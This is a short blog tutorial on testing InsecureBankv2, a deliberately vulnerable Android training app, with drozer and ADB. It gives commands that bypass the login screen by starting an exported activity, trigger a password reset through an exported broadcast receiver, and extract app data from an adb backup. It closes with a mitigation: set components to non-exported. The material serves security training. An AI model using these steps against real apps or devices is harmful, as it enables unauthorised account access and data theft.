Sat. Oct 19th, 2019

Ethical Hacking Playground

hacking is curiosity

How To Test Android Application Security Using Drozer & InsecureBankv2?

2 min read

Let’s Begin!

First of all, we need to forward the connection so type this command using the Android Debug Bridge (ADB)

adb forward tcp:31415 tcp:31415

Funny, 31415 is the start of the mathematical constant PI.

Now connect to drozer.

drozer console connect

Image result for drozer

How to Bypass the Login Screen?

To bypass the login screen we first need to get the activity info.

run app.activity.info -a com.android.insecurebankv2

Now lets bypass!

run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin


bypass login drozer

Success!! it now should log you in.

How to Reset the Password Through SMS?

If you want to reset the password through SMS, type in this command here.

adb shell am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber --es newpass


drozer sms

Awesome!, it should send you an SMS with the new password.

How to Reveal Sensitive Information From Backup?

First, we need to perform a backup so type in this command here.

adb backup -f backup.ab com.android.insecurebankv2

Now, we need to extract this backfile using Android Backup Extractor tool.

https://sourceforge.net/projects/adbextractor/

java -jar abe.jar unpack

unpack backup drozer

When we unzip backup.zip, there should be some juicy information.

Hope you enjoyed this information,

Remember practice is the key to success.

Mitigations:

Let’s first decode the APK  and retrieve the Manifest file.

apktool decode AndroidManifest.xml

Open the AndroidManifest.xml in a text editor and you will see that, the majority of the Activities and the BroadcastCastReciever has “exported” set to true, this is what causes the Application to be vulnerable.

Example:

exported=”true” android:name=”com.android.insecurebankv2.MyBroadCastReceiver”>

Make sure  that “exported” is set to false

Manifest File.PNG

Demonstration



Advertisements

Leave a Reply